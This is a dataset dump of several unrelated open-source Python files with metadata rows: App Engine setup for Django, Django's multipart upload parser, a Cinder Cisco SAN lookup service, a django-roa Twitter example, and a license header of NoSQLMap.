"a viewonly=True relation)." % (dest_column, dest_mapper))
else:
raise exc.UnmappedColumnError(
"Can't execute sync rule for "
"source column '%s'; mapper '%s' does not map this "
"column. Try using an explicit `foreign_keys` "
"collection which does not include destination column "
"'%s' (or use a viewonly=True relation)." %
(source_column, source_mapper, dest_column))
| mit | 2,865,210,851,805,501,400 | 37.935714 | 77 | 0.609429 | false |
yestech/gae-django-template | djangoappengine/boot.py | 33 | 7809 | import logging
import os
import sys
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DATA_ROOT = os.path.join(PROJECT_DIR, '.gaedata')
# Overrides for os.environ
env_ext = {'DJANGO_SETTINGS_MODULE': 'settings'}
def setup_env():
"""Configures app engine environment for command-line apps."""
# Try to import the appengine code from the system path.
try:
from google.appengine.api import apiproxy_stub_map
except ImportError:
for k in [k for k in sys.modules if k.startswith('google')]:
del sys.modules[k]
# Not on the system path. Build a list of alternative paths where it
# may be. First look within the project for a local copy, then look for
# where the Mac OS SDK installs it.
paths = [os.path.join(PROJECT_DIR, '.google_appengine'),
os.environ.get('APP_ENGINE_SDK'),
'/usr/local/google_appengine',
'/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine']
for path in os.environ.get('PATH', '').split(os.pathsep):
path = path.rstrip(os.sep)
if path.endswith('google_appengine'):
paths.append(path)
if os.name in ('nt', 'dos'):
path = r'%(PROGRAMFILES)s\Google\google_appengine' % os.environ
paths.append(path)
# Loop through all possible paths and look for the SDK dir.
sdk_path = None
for path in paths:
if not path:
continue
path = os.path.expanduser(path)
path = os.path.realpath(path)
if os.path.exists(path):
sdk_path = path
break
if sdk_path is None:
# The SDK could not be found in any known location.
sys.stderr.write('The Google App Engine SDK could not be found!\n'
"Make sure it's accessible via your PATH "
"environment and called google_appengine.\n")
sys.exit(1)
# Add the SDK and the libraries within it to the system path.
extra_paths = [sdk_path]
lib = os.path.join(sdk_path, 'lib')
# Automatically add all packages in the SDK's lib folder:
for dir in os.listdir(lib):
path = os.path.join(lib, dir)
# Package can be under 'lib/<pkg>/<pkg>/' or 'lib/<pkg>/lib/<pkg>/'
detect = (os.path.join(path, dir), os.path.join(path, 'lib', dir))
for path in detect:
if os.path.isdir(path) and not dir == 'django':
extra_paths.append(os.path.dirname(path))
break
sys.path = extra_paths + sys.path
from google.appengine.api import apiproxy_stub_map
setup_project()
from .utils import have_appserver
if have_appserver:
# App Engine's threading.local is broken
setup_threading()
elif not os.path.exists(DATA_ROOT):
os.mkdir(DATA_ROOT)
setup_logging()
if not have_appserver:
# Patch Django to support loading management commands from zip files
from django.core import management
management.find_commands = find_commands
def find_commands(management_dir):
"""
Given a path to a management directory, returns a list of all the command
names that are available.
This version works for django deployments which are file based or
contained in a ZIP (in sys.path).
Returns an empty list if no commands are defined.
"""
import pkgutil
return [modname for importer, modname, ispkg in pkgutil.iter_modules(
[os.path.join(management_dir, 'commands')]) if not ispkg]
def setup_threading():
# XXX: GAE's threading.local doesn't work correctly with subclassing
try:
from django.utils._threading_local import local
import threading
threading.local = local
except ImportError:
pass
def setup_logging():
# Fix Python 2.6 logging module
logging.logMultiprocessing = 0
# Enable logging
level = logging.DEBUG
from .utils import have_appserver
if have_appserver:
# We can't import settings at this point when running a normal
# manage.py command because this module gets imported from settings.py
from django.conf import settings
if not settings.DEBUG:
level = logging.INFO
logging.getLogger().setLevel(level)
def setup_project():
from .utils import have_appserver, on_production_server
if have_appserver:
# This fixes a pwd import bug for os.path.expanduser()
env_ext['HOME'] = PROJECT_DIR
# The dev_appserver creates a sandbox which restricts access to certain
# modules and builtins in order to emulate the production environment.
# Here we get the subprocess module back into the dev_appserver sandbox.
# This module is just too important for development.
# Also we add the compiler/parser module back and enable https connections
# (seem to be broken on Windows because the _ssl module is disallowed).
if not have_appserver:
from google.appengine.tools import dev_appserver
try:
# Backup os.environ. It gets overwritten by the dev_appserver,
# but it's needed by the subprocess module.
env = dev_appserver.DEFAULT_ENV
dev_appserver.DEFAULT_ENV = os.environ.copy()
dev_appserver.DEFAULT_ENV.update(env)
# Backup the buffer() builtin. The subprocess in Python 2.5 on
# Linux and OS X uses needs it, but the dev_appserver removes it.
dev_appserver.buffer = buffer
except AttributeError:
logging.warn('Could not patch the default environment. '
'The subprocess module will not work correctly.')
try:
# Allow importing compiler/parser and _ssl modules (for https)
dev_appserver.HardenedModulesHook._WHITE_LIST_C_MODULES.extend(
('parser', '_ssl'))
except AttributeError:
logging.warn('Could not patch modules whitelist. '
'The compiler and parser modules will not work and '
'SSL support is disabled.')
elif not on_production_server:
try:
# Restore the real subprocess module
from google.appengine.api.mail_stub import subprocess
sys.modules['subprocess'] = subprocess
# Re-inject the buffer() builtin into the subprocess module
from google.appengine.tools import dev_appserver
subprocess.buffer = dev_appserver.buffer
except Exception, e:
logging.warn('Could not add the subprocess module to the sandbox: %s' % e)
os.environ.update(env_ext)
extra_paths = [PROJECT_DIR, os.path.join(os.path.dirname(__file__), 'lib')]
zip_packages_dir = os.path.join(PROJECT_DIR, 'zip-packages')
# We support zipped packages in the common and project folders.
if os.path.isdir(zip_packages_dir):
for zip_package in os.listdir(zip_packages_dir):
extra_paths.append(os.path.join(zip_packages_dir, zip_package))
# App Engine causes main.py to be reloaded if an exception gets raised
# on the first request of a main.py instance, so don't call setup_project()
# multiple times. We ensure this indirectly by checking if we've already
# modified sys.path, already.
if len(sys.path) < len(extra_paths) or \
sys.path[:len(extra_paths)] != extra_paths:
for path in extra_paths:
while path in sys.path:
sys.path.remove(path)
sys.path = extra_paths + sys.path
| bsd-3-clause | 6,872,104,691,817,585,000 | 42.143646 | 147 | 0.628121 | false |
gminds/rapidnewsng | django/http/multipartparser.py | 19 | 23043 | """
Multi-part parsing for file uploads.
Exposes one class, ``MultiPartParser``, which feeds chunks of uploaded data to
file upload handlers for processing.
"""
from __future__ import unicode_literals
import base64
import cgi
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_text
from django.utils import six
from django.utils.text import unescape_entities
from django.core.files.uploadhandler import StopUpload, SkipFile, StopFutureHandlers
__all__ = ('MultiPartParser', 'MultiPartParserError', 'InputStreamExhausted')
class MultiPartParserError(Exception):
pass
class InputStreamExhausted(Exception):
"""
No more reads are allowed from this device.
"""
pass
RAW = "raw"
FILE = "file"
FIELD = "field"
class MultiPartParser(object):
"""
A rfc2388 multipart/form-data parser.
``MultiValueDict.parse()`` reads the input stream in ``chunk_size`` chunks
and returns a tuple of ``(MultiValueDict(POST), MultiValueDict(FILES))``.
"""
def __init__(self, META, input_data, upload_handlers, encoding=None):
"""
Initialize the MultiPartParser object.
:META:
The standard ``META`` dictionary in Django request objects.
:input_data:
The raw post data, as a file-like object.
:upload_handler:
An UploadHandler instance that performs operations on the uploaded
data.
:encoding:
The encoding with which to treat the incoming data.
"""
#
# Content-Type should containt multipart and the boundary information.
#
content_type = META.get('HTTP_CONTENT_TYPE', META.get('CONTENT_TYPE', ''))
if not content_type.startswith('multipart/'):
raise MultiPartParserError('Invalid Content-Type: %s' % content_type)
# Parse the header to get the boundary to split the parts.
ctypes, opts = parse_header(content_type.encode('ascii'))
boundary = opts.get('boundary')
if not boundary or not cgi.valid_boundary(boundary):
raise MultiPartParserError('Invalid boundary in multipart: %s' % boundary)
# Content-Length should contain the length of the body we are about
# to receive.
try:
content_length = int(META.get('HTTP_CONTENT_LENGTH', META.get('CONTENT_LENGTH', 0)))
except (ValueError, TypeError):
content_length = 0
if content_length < 0:
# This means we shouldn't continue...raise an error.
raise MultiPartParserError("Invalid content length: %r" % content_length)
if isinstance(boundary, six.text_type):
boundary = boundary.encode('ascii')
self._boundary = boundary
self._input_data = input_data
# For compatibility with low-level network APIs (with 32-bit integers),
# the chunk size should be < 2^31, but still divisible by 4.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
self._chunk_size = min([2**31-4] + possible_sizes)
self._meta = META
self._encoding = encoding or settings.DEFAULT_CHARSET
self._content_length = content_length
self._upload_handlers = upload_handlers
def parse(self):
"""
Parse the POST data and break it into a FILES MultiValueDict and a POST
MultiValueDict.
Returns a tuple containing the POST and FILES dictionary, respectively.
"""
# We have to import QueryDict down here to avoid a circular import.
from django.http import QueryDict
encoding = self._encoding
handlers = self._upload_handlers
# HTTP spec says that Content-Length >= 0 is valid
# handling content-length == 0 before continuing
if self._content_length == 0:
return QueryDict('', encoding=self._encoding), MultiValueDict()
# See if the handler will want to take care of the parsing.
# This allows overriding everything if somebody wants it.
for handler in handlers:
result = handler.handle_raw_input(self._input_data,
self._meta,
self._content_length,
self._boundary,
encoding)
if result is not None:
return result[0], result[1]
# Create the data structures to be used later.
self._post = QueryDict('', mutable=True)
self._files = MultiValueDict()
# Instantiate the parser and stream:
stream = LazyStream(ChunkIter(self._input_data, self._chunk_size))
# Whether or not to signal a file-completion at the beginning of the loop.
old_field_name = None
counters = [0] * len(handlers)
try:
for item_type, meta_data, field_stream in Parser(stream, self._boundary):
if old_field_name:
# We run this at the beginning of the next loop
# since we cannot be sure a file is complete until
# we hit the next boundary/part of the multipart content.
self.handle_file_complete(old_field_name, counters)
old_field_name = None
try:
disposition = meta_data['content-disposition'][1]
field_name = disposition['name'].strip()
except (KeyError, IndexError, AttributeError):
continue
transfer_encoding = meta_data.get('content-transfer-encoding')
if transfer_encoding is not None:
transfer_encoding = transfer_encoding[0].strip()
field_name = force_text(field_name, encoding, errors='replace')
if item_type == FIELD:
# This is a post field, we can just set it in the post
if transfer_encoding == 'base64':
raw_data = field_stream.read()
try:
data = str(raw_data).decode('base64')
except:
data = raw_data
else:
data = field_stream.read()
self._post.appendlist(field_name,
force_text(data, encoding, errors='replace'))
elif item_type == FILE:
# This is a file, use the handler...
file_name = disposition.get('filename')
if not file_name:
continue
file_name = force_text(file_name, encoding, errors='replace')
file_name = self.IE_sanitize(unescape_entities(file_name))
content_type = meta_data.get('content-type', ('',))[0].strip()
content_type_extra = meta_data.get('content-type', (0, {}))[1]
if content_type_extra is None:
content_type_extra = {}
try:
charset = content_type_extra.get('charset', None)
except:
charset = None
try:
content_length = int(meta_data.get('content-length')[0])
except (IndexError, TypeError, ValueError):
content_length = None
counters = [0] * len(handlers)
try:
for handler in handlers:
try:
handler.new_file(field_name, file_name,
content_type, content_length,
charset, content_type_extra.copy())
except StopFutureHandlers:
break
for chunk in field_stream:
if transfer_encoding == 'base64':
# We only special-case base64 transfer encoding
# We should always read base64 streams by multiple of 4
over_bytes = len(chunk) % 4
if over_bytes:
over_chunk = field_stream.read(4 - over_bytes)
chunk += over_chunk
try:
chunk = base64.b64decode(chunk)
except Exception as e:
# Since this is only a chunk, any error is an unfixable error.
raise MultiPartParserError("Could not decode base64 data: %r" % e)
for i, handler in enumerate(handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk,
counters[i])
counters[i] += chunk_length
if chunk is None:
# If the chunk received by the handler is None, then don't continue.
break
except SkipFile:
# Just use up the rest of this file...
exhaust(field_stream)
else:
# Handle file upload completions on next iteration.
old_field_name = field_name
else:
# If this is neither a FIELD or a FILE, just exhaust the stream.
exhaust(stream)
except StopUpload as e:
if not e.connection_reset:
exhaust(self._input_data)
else:
# Make sure that the request data is all fed
exhaust(self._input_data)
# Signal that the upload has completed.
for handler in handlers:
retval = handler.upload_complete()
if retval:
break
return self._post, self._files
def handle_file_complete(self, old_field_name, counters):
"""
Handle all the signalling that takes place when a file is complete.
"""
for i, handler in enumerate(self._upload_handlers):
file_obj = handler.file_complete(counters[i])
if file_obj:
# If it returns a file object, then set the files dict.
self._files.appendlist(force_text(old_field_name,
self._encoding,
errors='replace'),
file_obj)
break
def IE_sanitize(self, filename):
"""Cleanup filename from Internet Explorer full paths."""
return filename and filename[filename.rfind("\\")+1:].strip()
class LazyStream(six.Iterator):
"""
The LazyStream wrapper allows one to get and "unget" bytes from a stream.
Given a producer object (an iterator that yields bytestrings), the
LazyStream object will support iteration, reading, and keeping a "look-back"
variable in case you need to "unget" some bytes.
"""
def __init__(self, producer, length=None):
"""
Every LazyStream must have a producer when instantiated.
A producer is an iterable that returns a string each time it
is called.
"""
self._producer = producer
self._empty = False
self._leftover = b''
self.length = length
self.position = 0
self._remaining = length
self._unget_history = []
def tell(self):
return self.position
def read(self, size=None):
def parts():
remaining = (size is not None and [size] or [self._remaining])[0]
# do the whole thing in one shot if no limit was provided.
if remaining is None:
yield b''.join(self)
return
# otherwise do some bookkeeping to return exactly enough
# of the stream and stashing any extra content we get from
# the producer
while remaining != 0:
assert remaining > 0, 'remaining bytes to read should never go negative'
chunk = next(self)
emitting = chunk[:remaining]
self.unget(chunk[remaining:])
remaining -= len(emitting)
yield emitting
out = b''.join(parts())
return out
def __next__(self):
"""
Used when the exact number of bytes to read is unimportant.
This procedure just returns whatever is chunk is conveniently returned
from the iterator instead. Useful to avoid unnecessary bookkeeping if
performance is an issue.
"""
if self._leftover:
output = self._leftover
self._leftover = b''
else:
output = next(self._producer)
self._unget_history = []
self.position += len(output)
return output
def close(self):
"""
Used to invalidate/disable this lazy stream.
Replaces the producer with an empty list. Any leftover bytes that have
already been read will still be reported upon read() and/or next().
"""
self._producer = []
def __iter__(self):
return self
def unget(self, bytes):
"""
Places bytes back onto the front of the lazy stream.
Future calls to read() will return those bytes first. The
stream position and thus tell() will be rewound.
"""
if not bytes:
return
self._update_unget_history(len(bytes))
self.position -= len(bytes)
self._leftover = b''.join([bytes, self._leftover])
def _update_unget_history(self, num_bytes):
"""
Updates the unget history as a sanity check to see if we've pushed
back the same number of bytes in one chunk. If we keep ungetting the
same number of bytes many times (here, 50), we're mostly likely in an
infinite loop of some sort. This is usually caused by a
maliciously-malformed MIME request.
"""
self._unget_history = [num_bytes] + self._unget_history[:49]
number_equal = len([current_number for current_number in self._unget_history
if current_number == num_bytes])
if number_equal > 40:
raise SuspiciousOperation(
"The multipart parser got stuck, which shouldn't happen with"
" normal uploaded files. Check for malicious upload activity;"
" if there is none, report this to the Django developers."
)
class ChunkIter(six.Iterator):
"""
An iterable that will yield chunks of data. Given a file-like object as the
constructor, this object will yield chunks of read operations from that
object.
"""
def __init__(self, flo, chunk_size=64 * 1024):
self.flo = flo
self.chunk_size = chunk_size
def __next__(self):
try:
data = self.flo.read(self.chunk_size)
except InputStreamExhausted:
raise StopIteration()
if data:
return data
else:
raise StopIteration()
def __iter__(self):
return self
class InterBoundaryIter(six.Iterator):
"""
A Producer that will iterate over boundaries.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
def __iter__(self):
return self
def __next__(self):
try:
return LazyStream(BoundaryIter(self._stream, self._boundary))
except InputStreamExhausted:
raise StopIteration()
class BoundaryIter(six.Iterator):
"""
A Producer that is sensitive to boundaries.
Will happily yield bytes until a boundary is found. Will yield the bytes
before the boundary, throw away the boundary bytes themselves, and push the
post-boundary bytes back on the stream.
The future calls to next() after locating the boundary will raise a
StopIteration exception.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
self._done = False
# rollback an additional six bytes because the format is like
# this: CRLF<boundary>[--CRLF]
self._rollback = len(boundary) + 6
# Try to use mx fast string search if available. Otherwise
# use Python find. Wrap the latter for consistency.
unused_char = self._stream.read(1)
if not unused_char:
raise InputStreamExhausted()
self._stream.unget(unused_char)
try:
from mx.TextTools import FS
self._fs = FS(boundary).find
except ImportError:
self._fs = lambda data: data.find(boundary)
def __iter__(self):
return self
def __next__(self):
if self._done:
raise StopIteration()
stream = self._stream
rollback = self._rollback
bytes_read = 0
chunks = []
for bytes in stream:
bytes_read += len(bytes)
chunks.append(bytes)
if bytes_read > rollback:
break
if not bytes:
break
else:
self._done = True
if not chunks:
raise StopIteration()
chunk = b''.join(chunks)
boundary = self._find_boundary(chunk, len(chunk) < self._rollback)
if boundary:
end, next = boundary
stream.unget(chunk[next:])
self._done = True
return chunk[:end]
else:
# make sure we dont treat a partial boundary (and
# its separators) as data
if not chunk[:-rollback]:# and len(chunk) >= (len(self._boundary) + 6):
# There's nothing left, we should just return and mark as done.
self._done = True
return chunk
else:
stream.unget(chunk[-rollback:])
return chunk[:-rollback]
def _find_boundary(self, data, eof = False):
"""
Finds a multipart boundary in data.
Should no boundry exist in the data None is returned instead. Otherwise
a tuple containing the indices of the following are returned:
* the end of current encapsulation
* the start of the next encapsulation
"""
index = self._fs(data)
if index < 0:
return None
else:
end = index
next = index + len(self._boundary)
# backup over CRLF
last = max(0, end-1)
if data[last:last+1] == b'\n':
end -= 1
last = max(0, end-1)
if data[last:last+1] == b'\r':
end -= 1
return end, next
def exhaust(stream_or_iterable):
"""
Completely exhausts an iterator or stream.
Raise a MultiPartParserError if the argument is not a stream or an iterable.
"""
iterator = None
try:
iterator = iter(stream_or_iterable)
except TypeError:
iterator = ChunkIter(stream_or_iterable, 16384)
if iterator is None:
raise MultiPartParserError('multipartparser.exhaust() was passed a non-iterable or stream parameter')
for __ in iterator:
pass
def parse_boundary_stream(stream, max_header_size):
"""
Parses one and exactly one stream that encapsulates a boundary.
"""
# Stream at beginning of header, look for end of header
# and parse it if found. The header must fit within one
# chunk.
chunk = stream.read(max_header_size)
# 'find' returns the top of these four bytes, so we'll
# need to munch them later to prevent them from polluting
# the payload.
header_end = chunk.find(b'\r\n\r\n')
def _parse_header(line):
main_value_pair, params = parse_header(line)
try:
name, value = main_value_pair.split(':', 1)
except:
raise ValueError("Invalid header: %r" % line)
return name, (value, params)
if header_end == -1:
# we find no header, so we just mark this fact and pass on
# the stream verbatim
stream.unget(chunk)
return (RAW, {}, stream)
header = chunk[:header_end]
# here we place any excess chunk back onto the stream, as
# well as throwing away the CRLFCRLF bytes from above.
stream.unget(chunk[header_end + 4:])
TYPE = RAW
outdict = {}
# Eliminate blank lines
for line in header.split(b'\r\n'):
# This terminology ("main value" and "dictionary of
# parameters") is from the Python docs.
try:
name, (value, params) = _parse_header(line)
except:
continue
if name == 'content-disposition':
TYPE = FIELD
if params.get('filename'):
TYPE = FILE
outdict[name] = value, params
if TYPE == RAW:
stream.unget(chunk)
return (TYPE, outdict, stream)
class Parser(object):
def __init__(self, stream, boundary):
self._stream = stream
self._separator = b'--' + boundary
def __iter__(self):
boundarystream = InterBoundaryIter(self._stream, self._separator)
for sub_stream in boundarystream:
# Iterate over each part
yield parse_boundary_stream(sub_stream, 1024)
def parse_header(line):
""" Parse the header into a key-value.
Input (line): bytes, output: unicode for key/name, bytes for value which
will be decoded later
"""
plist = _parse_header_params(b';' + line)
key = plist.pop(0).lower().decode('ascii')
pdict = {}
for p in plist:
i = p.find(b'=')
if i >= 0:
name = p[:i].strip().lower().decode('ascii')
value = p[i+1:].strip()
if len(value) >= 2 and value[:1] == value[-1:] == b'"':
value = value[1:-1]
value = value.replace(b'\\\\', b'\\').replace(b'\\"', b'"')
pdict[name] = value
return key, pdict
def _parse_header_params(s):
plist = []
while s[:1] == b';':
s = s[1:]
end = s.find(b';')
while end > 0 and s.count(b'"', 0, end) % 2:
end = s.find(b';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
plist.append(f.strip())
s = s[end:]
return plist
| bsd-3-clause | -1,504,735,567,018,942,200 | 35.061033 | 109 | 0.545025 | false |
yanheven/cinder | cinder/zonemanager/drivers/cisco/cisco_fc_san_lookup_service.py | 3 | 14776 | # (c) Copyright 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import random
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_utils import excutils
import six
from cinder import exception
from cinder.i18n import _, _LE
from cinder import ssh_utils
from cinder import utils
from cinder.zonemanager.drivers.cisco import cisco_fabric_opts as fabric_opts
import cinder.zonemanager.drivers.cisco.fc_zone_constants as zone_constant
from cinder.zonemanager import fc_san_lookup_service as fc_service
from cinder.zonemanager import utils as zm_utils
LOG = logging.getLogger(__name__)
class CiscoFCSanLookupService(fc_service.FCSanLookupService):
"""The SAN lookup service that talks to Cisco switches.
Version History:
1.0.0 - Initial version
"""
VERSION = "1.0.0"
def __init__(self, **kwargs):
"""Initializing the client."""
super(CiscoFCSanLookupService, self).__init__(**kwargs)
self.configuration = kwargs.get('configuration', None)
self.create_configuration()
self.switch_user = ""
self.switch_port = ""
self.switch_pwd = ""
self.switch_ip = ""
self.sshpool = None
def create_configuration(self):
"""Configuration specific to SAN context values."""
config = self.configuration
fabric_names = [x.strip() for x in config.fc_fabric_names.split(',')]
LOG.debug('Fabric Names: %s', fabric_names)
# There can be more than one SAN in the network and we need to
# get credentials for each for SAN context lookup later.
# Cisco Zonesets require VSANs
if fabric_names:
self.fabric_configs = fabric_opts.load_fabric_configurations(
fabric_names)
def get_device_mapping_from_network(self,
initiator_wwn_list,
target_wwn_list):
"""Provides the initiator/target map for available SAN contexts.
Looks up fcns database of each fc SAN configured to find logged in
devices and returns a map of initiator and target port WWNs for each
fabric.
:param initiator_wwn_list: List of initiator port WWN
:param target_wwn_list: List of target port WWN
:returns List -- device wwn map in following format
{
<San name>: {
'initiator_port_wwn_list':
('200000051e55a100', '200000051e55a121'..)
'target_port_wwn_list':
('100000051e55a100', '100000051e55a121'..)
}
}
:raises Exception when connection to fabric is failed
"""
device_map = {}
formatted_target_list = []
formatted_initiator_list = []
fabric_map = {}
fabric_names = self.configuration.fc_fabric_names
if not fabric_names:
raise exception.InvalidParameterValue(
err=_("Missing Fibre Channel SAN configuration "
"param - fc_fabric_names"))
fabrics = [x.strip() for x in fabric_names.split(',')]
LOG.debug("FC Fabric List: %s", fabrics)
if fabrics:
for t in target_wwn_list:
formatted_target_list.append(zm_utils.get_formatted_wwn(t))
for i in initiator_wwn_list:
formatted_initiator_list.append(zm_utils.get_formatted_wwn(i))
for fabric_name in fabrics:
self.switch_ip = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_address')
self.switch_user = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_user')
self.switch_pwd = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_password')
self.switch_port = self.fabric_configs[fabric_name].safe_get(
'cisco_fc_fabric_port')
zoning_vsan = self.fabric_configs[fabric_name].safe_get(
'cisco_zoning_vsan')
# Get name server data from fabric and find the targets
# logged in
nsinfo = ''
LOG.debug("show fcns database for vsan %s", zoning_vsan)
nsinfo = self.get_nameserver_info(zoning_vsan)
LOG.debug("Lookup service:fcnsdatabase-%s", nsinfo)
LOG.debug("Lookup service:initiator list from caller-%s",
formatted_initiator_list)
LOG.debug("Lookup service:target list from caller-%s",
formatted_target_list)
visible_targets = filter(lambda x: x in formatted_target_list,
nsinfo)
visible_initiators = filter(lambda x: x in
formatted_initiator_list, nsinfo)
if visible_targets:
LOG.debug("Filtered targets is: %s", visible_targets)
# getting rid of the : before returning
for idx, elem in enumerate(visible_targets):
elem = str(elem).replace(':', '')
visible_targets[idx] = elem
else:
LOG.debug("No targets are in the fcns database"
" for vsan %s", zoning_vsan)
if visible_initiators:
# getting rid of the : before returning ~sk
for idx, elem in enumerate(visible_initiators):
elem = str(elem).replace(':', '')
visible_initiators[idx] = elem
else:
LOG.debug("No initiators are in the fcns database"
" for vsan %s", zoning_vsan)
fabric_map = {'initiator_port_wwn_list': visible_initiators,
'target_port_wwn_list': visible_targets
}
device_map[zoning_vsan] = fabric_map
LOG.debug("Device map for SAN context: %s", device_map)
return device_map
def get_nameserver_info(self, fabric_vsan):
"""Get fcns database info from fabric.
This method will return the connected node port wwn list(local
and remote) for the given switch fabric
"""
cli_output = None
nsinfo_list = []
try:
cmd = ([zone_constant.FCNS_SHOW, fabric_vsan, ' | no-more'])
cli_output = self._get_switch_info(cmd)
except exception.FCSanLookupServiceException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed collecting show fcns database for"
" fabric"))
if cli_output:
nsinfo_list = self._parse_ns_output(cli_output)
LOG.debug("Connector returning fcns info-%s", nsinfo_list)
return nsinfo_list
def _get_switch_info(self, cmd_list):
stdout, stderr, sw_data = None, None, None
try:
stdout, stderr = self._run_ssh(cmd_list, True, 1)
LOG.debug("CLI output from ssh - output:%s", stdout)
if (stdout):
sw_data = stdout.splitlines()
return sw_data
except processutils.ProcessExecutionError as e:
msg = _("Error while getting data via ssh: (command=%(cmd)s "
"error=%(err)s).") % {'cmd': cmd_list,
'err': six.text_type(e)}
LOG.error(msg)
raise exception.CiscoZoningCliException(reason=msg)
def _parse_ns_output(self, switch_data):
"""Parses name server data.
Parses nameserver raw data and adds the device port wwns to the list
:returns list of device port wwn from ns info
"""
nsinfo_list = []
for line in switch_data:
if not(" N " in line):
continue
linesplit = line.split()
if len(linesplit) > 2:
node_port_wwn = linesplit[2]
nsinfo_list.append(node_port_wwn)
else:
msg = _("Malformed fcns output string: %s") % line
LOG.error(msg)
raise exception.InvalidParameterValue(err=msg)
return nsinfo_list
def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
command = ' '.join(cmd_list)
if not self.sshpool:
self.sshpool = ssh_utils.SSHPool(self.switch_ip,
self.switch_port,
None,
self.switch_user,
self.switch_pwd,
min_size=1,
max_size=5)
last_exception = None
try:
with self.sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
return processutils.ssh_execute(
ssh,
command,
check_exit_code=check_exit_code)
except Exception as e:
msg = _("Exception: %s") % six.text_type(e)
LOG.error(msg)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s") % command)
def _ssh_execute(self, cmd_list, check_exit_code=True, attempts=1):
"""Execute cli with status update.
Executes CLI commands where status return is expected.
cmd_list is a list of commands, where each command is itself
a list of parameters. We use utils.check_ssh_injection to check each
command, but then join then with " ; " to form a single command.
"""
# Check that each command is secure
for cmd in cmd_list:
utils.check_ssh_injection(cmd)
# Combine into a single command.
command = ' ; '.join(map(lambda x: ' '.join(x), cmd_list))
if not self.sshpool:
self.sshpool = ssh_utils.SSHPool(self.switch_ip,
self.switch_port,
None,
self.switch_user,
self.switch_pwd,
min_size=1,
max_size=5)
stdin, stdout, stderr = None, None, None
LOG.debug("Executing command via ssh: %s" % command)
last_exception = None
try:
with self.sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
stdin, stdout, stderr = ssh.exec_command(command)
greenthread.sleep(random.randint(20, 500) / 100.0)
channel = stdout.channel
exit_status = channel.recv_exit_status()
LOG.debug("Exit Status from ssh:%s", exit_status)
# exit_status == -1 if no exit code was returned
if exit_status != -1:
LOG.debug('Result was %s' % exit_status)
if check_exit_code and exit_status != 0:
raise processutils.ProcessExecutionError(
exit_code=exit_status,
stdout=stdout,
stderr=stderr,
cmd=command)
else:
return True
else:
return True
except Exception as e:
msg = _("Exception: %s") % six.text_type(e)
LOG.error(msg)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
LOG.debug("Handling error case after SSH:%s", last_exception)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception as e:
with excutils.save_and_reraise_exception():
msg = (_("Error executing command via ssh: %s") %
six.text_type(e))
LOG.error(msg)
finally:
if stdin:
stdin.flush()
stdin.close()
if stdout:
stdout.close()
if stderr:
stderr.close()
def cleanup(self):
self.sshpool = None
| apache-2.0 | 1,509,850,864,616,719,000 | 40.622535 | 78 | 0.509204 | false |
bjarnoldus/django-roa | examples/twitter_roa/models.py | 1 | 1274 | from django.db import models
from django_roa import Model, Manager
from django_roa.db.query import RemoteQuerySet
class User(Model):
name = models.CharField(max_length=255)
screen_name = models.CharField(max_length=255)
description = models.TextField()
def __unicode__(self):
return '%s (%s)' % (self.name, self.screen_name)
@staticmethod
def get_resource_url_list():
return 'http://api.twitter.com/1/users/lookup.json?screen_name=twitterapi,twitter,twittersearch,twittermedia,twittermobile'
def get_resource_url_count(self):
return User.get_resource_url_list()
class FakeCountRemoteQuerySet(RemoteQuerySet):
def count(self):
"""
Because trying to count the whole number of tweets is stupid.
"""
return 20
class TweetManager(Manager):
def get_query_set(self):
return FakeCountRemoteQuerySet(self.model)
class Tweet(Model):
text = models.TextField()
source = models.CharField(max_length=50)
user = models.ForeignKey(User)
objects = TweetManager()
def __unicode__(self):
return '%s (%s)' % (self.text, self.id)
@staticmethod
def get_resource_url_list():
return 'http://api.twitter.com/1/statuses/public_timeline.json'
| bsd-3-clause | -4,442,288,461,831,171,000 | 26.106383 | 131 | 0.673469 | false |
cyberpunkych/NoSQLMap | nosqlmap.py | 1 | 27589 | #!/usr/bin/python
#NoSQLMap Copyright 2013 Russell Butturini
#This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
